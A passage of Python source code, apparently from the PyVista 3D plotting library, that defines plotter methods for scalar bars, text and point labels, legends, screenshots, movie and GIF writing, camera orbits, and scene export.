if position_y is None:
if vertical:
position_y = rcParams['colorbar_vertical']['position_y']
else:
position_y = rcParams['colorbar_horizontal']['position_y']
position_y += slot * height
# Adjust to make sure on the screen
if position_x + width > 1:
position_x -= width
if position_y + height > 1:
position_y -= height
# parse color
color = parse_color(color)
# Create scalar bar
self.scalar_bar = vtk.vtkScalarBarActor()
if background_color is not None:
background_color = parse_color(background_color, opacity=1.0)
background_color = np.array(background_color) * 255
self.scalar_bar.GetBackgroundProperty().SetColor(background_color[0:3])
if fill:
self.scalar_bar.DrawBackgroundOn()
lut = vtk.vtkLookupTable()
lut.DeepCopy(mapper.lookup_table)
ctable = vtk_to_numpy(lut.GetTable())
alphas = ctable[:, -1][:, np.newaxis] / 255.
use_table = ctable.copy()
use_table[:, -1] = 255.
ctable = (use_table * alphas) + background_color * (1 - alphas)
lut.SetTable(numpy_to_vtk(ctable, array_type=vtk.VTK_UNSIGNED_CHAR))
else:
lut = mapper.lookup_table
self.scalar_bar.SetLookupTable(lut)
if n_colors is not None:
self.scalar_bar.SetMaximumNumberOfColors(n_colors)
if n_labels < 1:
self.scalar_bar.DrawTickLabelsOff()
else:
self.scalar_bar.DrawTickLabelsOn()
self.scalar_bar.SetNumberOfLabels(n_labels)
if nan_annotation:
self.scalar_bar.DrawNanAnnotationOn()
if above_label:
self.scalar_bar.DrawAboveRangeSwatchOn()
self.scalar_bar.SetAboveRangeAnnotation(above_label)
if below_label:
self.scalar_bar.DrawBelowRangeSwatchOn()
self.scalar_bar.SetBelowRangeAnnotation(below_label)
# edit the size of the colorbar
self.scalar_bar.SetHeight(height)
self.scalar_bar.SetWidth(width)
self.scalar_bar.SetPosition(position_x, position_y)
if fmt is not None:
self.scalar_bar.SetLabelFormat(fmt)
if vertical:
self.scalar_bar.SetOrientationToVertical()
else:
self.scalar_bar.SetOrientationToHorizontal()
if label_font_size is not None or title_font_size is not None:
self.scalar_bar.UnconstrainedFontSizeOn()
self.scalar_bar.AnnotationTextScalingOn()
label_text = self.scalar_bar.GetLabelTextProperty()
anno_text = self.scalar_bar.GetAnnotationTextProperty()
label_text.SetColor(color)
anno_text.SetColor(color)
label_text.SetShadow(shadow)
anno_text.SetShadow(shadow)
# Set font
label_text.SetFontFamily(parse_font_family(font_family))
anno_text.SetFontFamily(parse_font_family(font_family))
label_text.SetItalic(italic)
anno_text.SetItalic(italic)
label_text.SetBold(bold)
anno_text.SetBold(bold)
if label_font_size:
label_text.SetFontSize(label_font_size)
anno_text.SetFontSize(label_font_size)
# Set properties
if title:
clim = mapper.scalar_range
self._scalar_bar_ranges[title] = clim
self._scalar_bar_mappers[title] = [mapper]
self.scalar_bar.SetTitle(title)
title_text = self.scalar_bar.GetTitleTextProperty()
title_text.SetJustificationToCentered()
title_text.SetItalic(italic)
title_text.SetBold(bold)
title_text.SetShadow(shadow)
if title_font_size:
title_text.SetFontSize(title_font_size)
# Set font
title_text.SetFontFamily(parse_font_family(font_family))
# set color
title_text.SetColor(color)
self._scalar_bar_actors[title] = self.scalar_bar
if interactive is None:
interactive = rcParams['interactive']
if self.shape != (1, 1):
interactive = False
elif interactive and self.shape != (1, 1):
err_str = 'Interactive scalar bars disabled for multi-renderer plots'
raise Exception(err_str)
if interactive and hasattr(self, 'iren'):
self.scalar_widget = vtk.vtkScalarBarWidget()
self.scalar_widget.SetScalarBarActor(self.scalar_bar)
self.scalar_widget.SetInteractor(self.iren)
self.scalar_widget.SetEnabled(1)
rep = self.scalar_widget.GetRepresentation()
# self.scalar_widget.On()
if vertical is True or vertical is None:
rep.SetOrientation(1) # 0 = Horizontal, 1 = Vertical
else:
rep.SetOrientation(0) # 0 = Horizontal, 1 = Vertical
self._scalar_bar_widgets[title] = self.scalar_widget
if use_opacity:
self.scalar_bar.SetUseOpacity(True)
if outline:
self.scalar_bar.SetDrawFrame(True)
frame_prop = self.scalar_bar.GetFrameProperty()
frame_prop.SetColor(color)
else:
self.scalar_bar.SetDrawFrame(False)
self.add_actor(self.scalar_bar, reset_camera=False, pickable=False)
return self.scalar_bar # return the actor
def update_scalars(self, scalars, mesh=None, render=True):
"""Update scalars of an object in the plotter.
Parameters
----------
scalars : np.ndarray
Scalars to replace existing scalars.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
"""
if mesh is None:
mesh = self.mesh
if isinstance(mesh, (collections.Iterable, pyvista.MultiBlock)):
# Recursive if need to update scalars on many meshes
for m in mesh:
self.update_scalars(scalars, mesh=m, render=False)
if render:
self.render()
return
if isinstance(scalars, str):
# Grab scalars array if name given
scalars = get_array(mesh, scalars)
if scalars is None:
if render:
self.render()
return
if scalars.shape[0] == mesh.GetNumberOfPoints():
data = mesh.GetPointData()
elif scalars.shape[0] == mesh.GetNumberOfCells():
data = mesh.GetCellData()
else:
raise_not_matching(scalars, mesh)
vtk_scalars = data.GetScalars()
if vtk_scalars is None:
raise Exception('No active scalars')
s = convert_array(vtk_scalars)
s[:] = scalars
data.Modified()
try:
# Why are the points updated here? Not all datasets have points
# and only the scalars array is modified by this function...
mesh.GetPoints().Modified()
except:
pass
if render:
self.render()
def update_coordinates(self, points, mesh=None, render=True):
"""Update the points of an object in the plotter.
Parameters
----------
points : np.ndarray
Points to replace existing points.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
"""
if mesh is None:
mesh = self.mesh
mesh.points = points
if render:
self.render()
def _clear_ren_win(self):
"""Clear the render window."""
if hasattr(self, 'ren_win'):
self.ren_win.Finalize()
del self.ren_win
def close(self):
"""Close the render window."""
# must close out widgets first
super(BasePlotter, self).close()
# Renderer has an axes widget, so close it
for renderer in self.renderers:
renderer.close()
# Grab screenshots of last render
self.last_image = self.screenshot(None, return_img=True)
self.last_image_depth = self.get_image_depth()
if hasattr(self, 'scalar_widget'):
del self.scalar_widget
# reset scalar bar stuff
self.clear()
self._clear_ren_win()
if hasattr(self, '_style'):
del self._style
if hasattr(self, 'iren'):
# self.iren.RemoveAllObservers()
for obs in self._observers.values():
self.iren.RemoveObservers(obs)
del self._observers
self.iren.TerminateApp()
del self.iren
if hasattr(self, 'textActor'):
del self.textActor
# end movie
if hasattr(self, 'mwriter'):
try:
self.mwriter.close()
except BaseException:
pass
# this helps managing closed plotters
self._closed = True
def deep_clean(self):
"""Clean the plotter of the memory."""
for renderer in self.renderers:
renderer.deep_clean()
for renderer in self._background_renderers:
if renderer is not None:
renderer.deep_clean()
# Do not remove the renderers on the clean
self.mesh = None
self.mapper = None
def add_text(self, text, position='upper_left', font_size=18, color=None,
font=None, shadow=False, name=None, viewport=False):
"""Add text to plot object in the top left corner by default.
Parameters
----------
text : str
The text to add the rendering
position : str, tuple(float)
Position to place the bottom left corner of the text box.
If tuple is used, the position of the text uses the pixel
coordinate system (default). In this case,
it returns a more general `vtkOpenGLTextActor`.
If string name is used, it returns a `vtkCornerAnnotation`
object normally used for fixed labels (like title or xlabel).
Default is to find the top left corner of the rendering window
and place text box up there. Available position: ``'lower_left'``,
``'lower_right'``, ``'upper_left'``, ``'upper_right'``,
``'lower_edge'``, ``'upper_edge'``, ``'right_edge'``, and
``'left_edge'``
font : string, optional
Font name may be courier, times, or arial
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
viewport: bool
If True and position is a tuple of float, uses
the normalized viewport coordinate system (values between 0.0
and 1.0 and support for HiDPI).
Return
------
textActor : vtk.vtkTextActor
Text actor added to plot
"""
if font is None:
font = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if color is None:
color = rcParams['font']['color']
if position is None:
# Set the position of the text to the top left corner
window_size = self.window_size
x = (window_size[0] * 0.02) / self.shape[0]
y = (window_size[1] * 0.85) / self.shape[0]
position = [x, y]
corner_mappings = {
'lower_left': vtk.vtkCornerAnnotation.LowerLeft,
'lower_right': vtk.vtkCornerAnnotation.LowerRight,
'upper_left': vtk.vtkCornerAnnotation.UpperLeft,
'upper_right': vtk.vtkCornerAnnotation.UpperRight,
'lower_edge': vtk.vtkCornerAnnotation.LowerEdge,
'upper_edge': vtk.vtkCornerAnnotation.UpperEdge,
'left_edge': vtk.vtkCornerAnnotation.LeftEdge,
'right_edge': vtk.vtkCornerAnnotation.RightEdge,
}
corner_mappings['ll'] = corner_mappings['lower_left']
corner_mappings['lr'] = corner_mappings['lower_right']
corner_mappings['ul'] = corner_mappings['upper_left']
corner_mappings['ur'] = corner_mappings['upper_right']
corner_mappings['top'] = corner_mappings['upper_edge']
corner_mappings['bottom'] = corner_mappings['lower_edge']
corner_mappings['right'] = corner_mappings['right_edge']
corner_mappings['r'] = corner_mappings['right_edge']
corner_mappings['left'] = corner_mappings['left_edge']
corner_mappings['l'] = corner_mappings['left_edge']
if isinstance(position, (int, str, bool)):
if isinstance(position, str):
position = corner_mappings[position]
elif position is True:
position = corner_mappings['upper_left']
self.textActor = vtk.vtkCornerAnnotation()
# This is how you set the font size with this actor
self.textActor.SetLinearFontScaleFactor(font_size // 2)
self.textActor.SetText(position, text)
else:
self.textActor = vtk.vtkTextActor()
self.textActor.SetInput(text)
self.textActor.SetPosition(position)
if viewport:
self.textActor.GetActualPositionCoordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetActualPosition2Coordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetTextProperty().SetFontSize(int(font_size * 2))
self.textActor.GetTextProperty().SetColor(parse_color(color))
self.textActor.GetTextProperty().SetFontFamily(FONT_KEYS[font])
self.textActor.GetTextProperty().SetShadow(shadow)
self.add_actor(self.textActor, reset_camera=False, name=name, pickable=False)
return self.textActor
def open_movie(self, filename, framerate=24):
"""Establish a connection to the ffmpeg writer.
Parameters
----------
filename : str
Filename of the movie to open. Filename should end in mp4,
but other filetypes may be supported. See "imagio.get_writer"
framerate : int, optional
Frames per second.
"""
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self.mwriter = imageio.get_writer(filename, fps=framerate)
def open_gif(self, filename):
"""Open a gif file.
Parameters
----------
filename : str
Filename of the gif to open. Filename must end in gif.
"""
if filename[-3:] != 'gif':
raise Exception('Unsupported filetype. Must end in .gif')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self._gif_filename = os.path.abspath(filename)
self.mwriter = imageio.get_writer(filename, mode='I')
def write_frame(self):
"""Write a single frame to the movie file."""
if not hasattr(self, 'mwriter'):
raise AssertionError('This plotter has not opened a movie or GIF file.')
self.mwriter.append_data(self.image)
def _run_image_filter(self, ifilter):
# Update filter and grab pixels
ifilter.Modified()
ifilter.Update()
image = pyvista.wrap(ifilter.GetOutput())
img_size = image.dimensions
img_array = pyvista.utilities.point_array(image, 'ImageScalars')
# Reshape and write
tgt_size = (img_size[1], img_size[0], -1)
return img_array.reshape(tgt_size)[::-1]
def get_image_depth(self,
fill_value=np.nan,
reset_camera_clipping_range=True):
"""Return a depth image representing current render window.
Parameters
----------
fill_value : float
Fill value for points in image that don't include objects in scene.
To not use a fill value, pass ``None``.
reset_camera_clipping_range : bool
Reset the camera clipping range to include data in view?
Return
------
image_depth : numpy.ndarray
Image of depth values from camera orthogonal to image plane
Notes
-----
Values in image_depth are negative to adhere to a
right-handed coordinate system.
"""
if not hasattr(self, 'ren_win') and hasattr(self, 'last_image_depth'):
zval = self.last_image_depth.copy()
if fill_value is not None:
zval[self._image_depth_null] = fill_value
return zval
# Ensure points in view are within clipping range of renderer?
if reset_camera_clipping_range:
self.renderer.ResetCameraClippingRange()
# Get the z-buffer image
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
ifilter.SetInputBufferTypeToZBuffer()
zbuff = self._run_image_filter(ifilter)[:, :, 0]
# Convert z-buffer values to depth from camera
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
near, far = self.camera.GetClippingRange()
if self.camera.GetParallelProjection():
zval = (zbuff - near) / (far - near)
else:
zval = 2 * near * far / ((zbuff - 0.5) * 2 * (far - near) - near - far)
# Consider image values outside clipping range as nans
args = np.logical_or(zval < -far, np.isclose(zval, -far))
self._image_depth_null = args
if fill_value is not None:
zval[args] = fill_value
return zval
def add_lines(self, lines, color=(1, 1, 1), width=5, label=None, name=None):
"""Add lines to the plotting object.
Parameters
----------
lines : np.ndarray or pyvista.PolyData
Points representing line segments. For example, two line segments
would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
width : float, optional
Thickness of lines
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Return
------
actor : vtk.vtkActor
Lines actor.
"""
if not isinstance(lines, np.ndarray):
raise Exception('Input should be an array of point segments')
lines = pyvista.lines_from_points(lines)
# Create mapper and add lines
mapper = vtk.vtkDataSetMapper()
mapper.SetInputData(lines)
rgb_color = parse_color(color)
# legend label
if label:
if not isinstance(label, str):
raise AssertionError('Label must be a string')
self._labels.append([lines, label, rgb_color])
# Create actor
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetLineWidth(width)
actor.GetProperty().EdgeVisibilityOn()
actor.GetProperty().SetEdgeColor(rgb_color)
actor.GetProperty().SetColor(rgb_color)
actor.GetProperty().LightingOff()
# Add to renderer
self.add_actor(actor, reset_camera=False, name=name, pickable=False)
return actor
def remove_scalar_bar(self):
"""Remove the scalar bar."""
if hasattr(self, 'scalar_bar'):
self.remove_actor(self.scalar_bar, reset_camera=False)
def add_point_labels(self, points, labels, italic=False, bold=True,
font_size=None, text_color=None,
font_family=None, shadow=False,
show_points=True, point_color=None, point_size=5,
name=None, shape_color='grey', shape='rounded_rect',
fill_shape=True, margin=3, shape_opacity=1.0,
pickable=False, render_points_as_spheres=False,
tolerance=0.001):
"""Create a point actor with one label from list labels assigned to each point.
Parameters
----------
points : np.ndarray or pyvista.Common
n x 3 numpy array of points or pyvista dataset with points
labels : list or str
List of labels. Must be the same length as points. If a string name
is given with a pyvista.Common input for points, then these are fetched.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default True
font_size : float, optional
Sets the size of the title font. Defaults to 16.
text_color : string or 3 item list, optional
Color of text. Either a string, rgb list, or hex color string.
text_color='white'
text_color='w'
text_color=[1, 1, 1]
text_color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
show_points : bool, optional
Controls if points are visible. Default True
point_color : string or 3 item list, optional. Color of points (if visible).
Either a string, rgb list, or hex color string. For example:
text_color='white'
text_color='w'
text_color=[1, 1, 1]
text_color='#FFFFFF'
point_size : float, optional
Size of points (if visible)
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
shape_color : string or 3 item list, optional. Color of points (if visible).
Either a string, rgb list, or hex color string. For example:
shape : str, optional
The string name of the shape to use. Options are ``'rect'`` or
``'rounded_rect'``. If you want no shape, pass ``None``
fill_shape : bool, optional
Fill the shape with the ``shape_color``. Outlines if ``False``.
margin : int, optional
The size of the margin on the label background shape. Default is 3.
shape_opacity : float
The opacity of the shape between zero and one.
tolerance : float
a tolerance to use to determine whether a point label is visible.
A tolerance is usually required because the conversion from world
space to display space during rendering introduces numerical
round-off.
Return
------
labelActor : vtk.vtkActor2D
VTK label actor. Can be used to change properties of the labels.
"""
if font_family is None:
font_family = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if point_color is None:
point_color = rcParams['color']
if text_color is None:
text_color = rcParams['font']['color']
if isinstance(points, (list, tuple)):
points = np.array(points)
if isinstance(points, np.ndarray):
vtkpoints = pyvista.PolyData(points) # Cast to poly data
elif is_pyvista_dataset(points):
vtkpoints = pyvista.PolyData(points.points)
if isinstance(labels, str):
labels = points.point_arrays[labels].astype(str)
else:
raise TypeError('Points type not usable: {}'.format(type(points)))
if len(vtkpoints.points) != len(labels):
raise Exception('There must be one label for each point')
if name is None:
name = '{}({})'.format(type(vtkpoints).__name__, vtkpoints.memory_address)
vtklabels = vtk.vtkStringArray()
vtklabels.SetName('labels')
for item in labels:
vtklabels.InsertNextValue(str(item))
vtkpoints.GetPointData().AddArray(vtklabels)
# Only show visible points
vis_points = vtk.vtkSelectVisiblePoints()
vis_points.SetInputData(vtkpoints)
vis_points.SetRenderer(self.renderer)
vis_points.SetTolerance(tolerance)
# Create hierarchy
hier = vtk.vtkPointSetToLabelHierarchy()
hier.SetInputConnection(vis_points.GetOutputPort())
hier.SetLabelArrayName('labels')
# create label mapper
labelMapper = vtk.vtkLabelPlacementMapper()
labelMapper.SetInputConnection(hier.GetOutputPort())
if not isinstance(shape, str):
labelMapper.SetShapeToNone()
elif shape.lower() in 'rect':
labelMapper.SetShapeToRect()
elif shape.lower() in 'rounded_rect':
labelMapper.SetShapeToRoundedRect()
else:
raise RuntimeError('Shape ({}) not understood'.format(shape))
if fill_shape:
labelMapper.SetStyleToFilled()
else:
labelMapper.SetStyleToOutline()
labelMapper.SetBackgroundColor(parse_color(shape_color))
labelMapper.SetBackgroundOpacity(shape_opacity)
labelMapper.SetMargin(margin)
textprop = hier.GetTextProperty()
textprop.SetItalic(italic)
textprop.SetBold(bold)
textprop.SetFontSize(font_size)
textprop.SetFontFamily(parse_font_family(font_family))
textprop.SetColor(parse_color(text_color))
textprop.SetShadow(shadow)
self.remove_actor('{}-points'.format(name), reset_camera=False)
self.remove_actor('{}-labels'.format(name), reset_camera=False)
# add points
if show_points:
style = 'points'
else:
style = 'surface'
self.add_mesh(vtkpoints, style=style, color=point_color,
point_size=point_size, name='{}-points'.format(name),
pickable=pickable,
render_points_as_spheres=render_points_as_spheres)
labelActor = vtk.vtkActor2D()
labelActor.SetMapper(labelMapper)
self.add_actor(labelActor, reset_camera=False,
name='{}-labels'.format(name), pickable=False)
return labelActor
def add_point_scalar_labels(self, points, labels, fmt=None, preamble='', **kwargs):
"""Label the points from a dataset with the values of their scalars.
Wrapper for :func:`pyvista.BasePlotter.add_point_labels`.
Parameters
----------
points : np.ndarray or pyvista.Common
n x 3 numpy array of points or pyvista dataset with points
labels : str
String name of the point data array to use.
fmt : str
String formatter used to format numerical data
"""
if not is_pyvista_dataset(points):
raise TypeError('input points must be a pyvista dataset, not: {}'.format(type(points)))
if not isinstance(labels, str):
raise TypeError('labels must be a string name of the scalars array to use')
if fmt is None:
fmt = rcParams['font']['fmt']
if fmt is None:
fmt = '%.6e'
scalars = points.point_arrays[labels]
phrase = '{} {}'.format(preamble, '%.3e')
labels = [phrase % val for val in scalars]
return self.add_point_labels(points, labels, **kwargs)
def add_points(self, points, **kwargs):
"""Add points to a mesh."""
kwargs['style'] = 'points'
return self.add_mesh(points, **kwargs)
def add_arrows(self, cent, direction, mag=1, **kwargs):
"""Add arrows to plotting object."""
direction = direction.copy()
if cent.ndim != 2:
cent = cent.reshape((-1, 3))
if direction.ndim != 2:
direction = direction.reshape((-1, 3))
direction[:,0] *= mag
direction[:,1] *= mag
direction[:,2] *= mag
pdata = pyvista.vector_poly_data(cent, direction)
# Create arrow object
arrow = vtk.vtkArrowSource()
arrow.Update()
glyph3D = vtk.vtkGlyph3D()
glyph3D.SetSourceData(arrow.GetOutput())
glyph3D.SetInputData(pdata)
glyph3D.SetVectorModeToUseVector()
glyph3D.Update()
arrows = wrap(glyph3D.GetOutput())
return self.add_mesh(arrows, **kwargs)
@staticmethod
def _save_image(image, filename, return_img=None):
"""Save a NumPy image array.
This is an internal helper.
"""
if not image.size:
raise Exception('Empty image. Have you run plot() first?')
# write screenshot to file
supported_formats = [".png", ".jpeg", ".jpg", ".bmp", ".tif", ".tiff"]
if isinstance(filename, str):
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
if not any([filename.lower().endswith(ext) for ext in supported_formats]):
filename += ".png"
filename = os.path.abspath(os.path.expanduser(filename))
w = imageio.imwrite(filename, image)
if not return_img:
return w
return image
def save_graphic(self, filename, title='PyVista Export', raster=True, painter=True):
"""Save a screenshot of the rendering window as a graphic file.
The supported formats are: '.svg', '.eps', '.ps', '.pdf', '.tex'
"""
if not hasattr(self, 'ren_win'):
raise AttributeError('This plotter is closed and unable to save a screenshot.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
filename = os.path.abspath(os.path.expanduser(filename))
extension = pyvista.fileio.get_ext(filename)
valid = ['.svg', '.eps', '.ps', '.pdf', '.tex']
if extension not in valid:
raise RuntimeError('Extension ({}) is an invalid choice. Valid options include: {}'.format(extension, ', '.join(valid)))
writer = vtk.vtkGL2PSExporter()
modes = {
'.svg': writer.SetFileFormatToSVG,
'.eps': writer.SetFileFormatToEPS,
'.ps': writer.SetFileFormatToPS,
'.pdf': writer.SetFileFormatToPDF,
'.tex': writer.SetFileFormatToTeX,
}
writer.CompressOff()
writer.SetFilePrefix(filename.replace(extension, ''))
writer.SetInput(self.ren_win)
modes[extension]()
writer.SetTitle(title)
writer.SetWrite3DPropsAsRasterImage(raster)
if painter:
writer.UsePainterSettings()
writer.Update()
return
def screenshot(self, filename=None, transparent_background=None,
return_img=None, window_size=None):
"""Take screenshot at current camera position.
Parameters
----------
filename : str, optional
Location to write image to. If None, no image is written.
transparent_background : bool, optional
Makes the background transparent. Default False.
return_img : bool, optional
If a string filename is given and this is true, a NumPy array of
the image will be returned.
Return
------
img : numpy.ndarray
Array containing pixel RGB and alpha. Sized:
[Window height x Window width x 3] for transparent_background=False
[Window height x Window width x 4] for transparent_background=True
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(sphere)
>>> plotter.screenshot('screenshot.png') # doctest:+SKIP
"""
if window_size is not None:
self.window_size = window_size
# configure image filter
if transparent_background is None:
transparent_background = rcParams['transparent_background']
self.image_transparent_background = transparent_background
# This if statement allows you to save screenshots of closed plotters
# This is needed for the sphinx-gallery work
if not hasattr(self, 'ren_win'):
# If plotter has been closed...
# check if last_image exists
if hasattr(self, 'last_image'):
# Save last image
return self._save_image(self.last_image, filename, return_img)
# Plotter hasn't been rendered or was improperly closed
raise AttributeError('This plotter is closed and unable to save a screenshot.')
self.render()
# debug: this needs to be called twice for some reason,
img = self.image
img = self.image
return self._save_image(img, filename, return_img)
def add_legend(self, labels=None, bcolor=(0.5, 0.5, 0.5), border=False,
size=None, name=None):
"""Add a legend to render window.
Entries must be a list containing one string and color entry for each
item.
Parameters
----------
labels : list, optional
When set to None, uses existing labels as specified by
- add_mesh
- add_lines
- add_points
List containing one entry for each item to be added to the
legend. Each entry must contain two strings, [label,
color], where label is the name of the item to add, and
color is the color of the label to add.
bcolor : list or string, optional
Background color, either a three item 0 to 1 RGB color
list, or a matplotlib color string (e.g. 'w' or 'white'
for a white color). If None, legend background is
disabled.
border : bool, optional
Controls if there will be a border around the legend.
Default False.
size : list, optional
Two float list, each float between 0 and 1. For example
[0.1, 0.1] would make the legend 10% the size of the
entire figure window.
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Return
------
legend : vtk.vtkLegendBoxActor
Actor for the legend.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, label='My Mesh')
>>> _ = plotter.add_mesh(othermesh, 'k', label='My Other Mesh')
>>> _ = plotter.add_legend()
>>> plotter.show() # doctest:+SKIP
Alternative manual example
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> legend_entries = []
>>> legend_entries.append(['My Mesh', 'w'])
>>> legend_entries.append(['My Other Mesh', 'k'])
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh)
>>> _ = plotter.add_mesh(othermesh, 'k')
>>> _ = plotter.add_legend(legend_entries)
>>> plotter.show() # doctest:+SKIP
"""
self.legend = vtk.vtkLegendBoxActor()
if labels is None:
# use existing labels
if not self._labels:
raise Exception('No labels input.\n\n'
'Add labels to individual items when adding them to'
'the plotting object with the "label=" parameter. '
'or enter them as the "labels" parameter.')
self.legend.SetNumberOfEntries(len(self._labels))
for i, (vtk_object, text, color) in enumerate(self._labels):
self.legend.SetEntry(i, vtk_object, text, parse_color(color))
else:
self.legend.SetNumberOfEntries(len(labels))
legendface = pyvista.single_triangle()
for i, (text, color) in enumerate(labels):
self.legend.SetEntry(i, legendface, text, parse_color(color))
if size:
self.legend.SetPosition2(size[0], size[1])
if bcolor is None:
self.legend.UseBackgroundOff()
else:
self.legend.UseBackgroundOn()
self.legend.SetBackgroundColor(bcolor)
if border:
self.legend.BorderOn()
else:
self.legend.BorderOff()
# Add to renderer
self.add_actor(self.legend, reset_camera=False, name=name, pickable=False)
return self.legend
def set_background(self, color, top=None, all_renderers=True):
"""Set the background color.
Parameters
----------
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
top : string or 3 item list, optional, defaults to None
If given, this will enable a gradient background where the
``color`` argument is at the bottom and the color given in ``top``
will be the color at the top of the renderer.
all_renderers : bool
If True, applies to all renderers in subplots. If False, then
only applies to the active renderer.
"""
if all_renderers:
for renderer in self.renderers:
renderer.set_background(color, top=top)
else:
self.renderer.set_background(color, top=top)
def remove_legend(self):
"""Remove the legend actor."""
if hasattr(self, 'legend'):
self.remove_actor(self.legend, reset_camera=False)
self.render()
def generate_orbital_path(self, factor=3., n_points=20, viewup=None, shift=0.0):
"""Generate an orbital path around the data scene.
Parameters
----------
factor : float
A scaling factor when biulding the orbital extent
n_points : int
number of points on the orbital path
viewup : list(float)
the normal to the orbital plane
shift : float, optional
shift the plane up/down from the center of the scene by this amount
"""
if viewup is None:
viewup = rcParams['camera']['viewup']
center = np.array(self.center)
bnds = np.array(self.bounds)
radius = (bnds[1] - bnds[0]) * factor
y = (bnds[3] - bnds[2]) * factor
if y > radius:
radius = y
center += np.array(viewup) * shift
return pyvista.Polygon(center=center, radius=radius, normal=viewup, n_sides=n_points)
def fly_to(self, point):
"""Move the current camera's focal point to a position point.
The movement is animated over the number of frames specified in
NumberOfFlyFrames. The LOD desired frame rate is used.
"""
if not hasattr(self, 'iren'):
raise AttributeError('This plotter does not have an interactive window')
return self.iren.FlyTo(self.renderer, *point)
def orbit_on_path(self, path=None, focus=None, step=0.5, viewup=None,
bkg=True, write_frames=False):
"""Orbit on the given path focusing on the focus point.
Parameters
----------
path : pyvista.PolyData
Path of orbital points. The order in the points is the order of
travel
focus : list(float) of length 3, optional
The point of focus the camera.
step : float, optional
The timestep between flying to each camera position
viewup : list(float)
the normal to the orbital plane
write_frames : bool
Assume a file is open and write a frame on each camera view during
the orbit.
"""
if focus is None:
focus = self.center
if viewup is None:
viewup = rcParams['camera']['viewup']
if path is None:
path = self.generate_orbital_path(viewup=viewup)
if not is_pyvista_dataset(path):
path = pyvista.PolyData(path)
points = path.points
# Make sure the whole scene is visible
self.camera.SetThickness(path.length)
def orbit():
"""Define the internal thread for running the orbit."""
for point in points:
self.set_position(point)
self.set_focus(focus)
self.set_viewup(viewup)
self.renderer.ResetCameraClippingRange()
self.render()
if bkg:
time.sleep(step)
if write_frames:
self.write_frame()
if bkg and isinstance(self, pyvista.BackgroundPlotter):
thread = Thread(target=orbit)
thread.start()
else:
bkg = False
orbit()
return
def export_vtkjs(self, filename, compress_arrays=False):
"""Export the current rendering scene as a VTKjs scene.
It can be used for rendering in a web browser.
"""
if not hasattr(self, 'ren_win'):
raise RuntimeError('Export must be called before showing/closing the scene.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
return export_plotter_vtkjs(self, filename, compress_arrays=compress_arrays)
def export_obj(self, filename):
"""Export scene to OBJ format."""
if not hasattr(self, "ren_win"):
raise RuntimeError("This plotter must still have a render window open.")
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
exporter = vtk.vtkOBJExporter()
exporter.SetFilePrefix(filename)
exporter.SetRenderWindow(self.ren_win)
return exporter.Write()
def __del__(self):
"""Delete the plotter."""
if not self._closed:
self.close()
self.deep_clean()
del self.renderers
def add_background_image(self, image_path, scale=1, auto_resize=True,
as_global=True):
"""Add a background image to a plot.
Parameters
----------
image_path : str
Path to an image file.
scale : float, optional
Scale the image larger or smaller relative to the size of
the window. For example, a scale size of 2 will make the
largest dimension of the image twice as large as the
largest dimension of the render window. Defaults to 1.
auto_resize : bool, optional
Resize the background when the render window changes size.
as_global : bool, optional
When multiple render windows are present, setting
``as_global=False`` will cause the background to only
appear in one window.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(pyvista.Sphere())
>>> plotter.add_background_image(examples.mapfile)
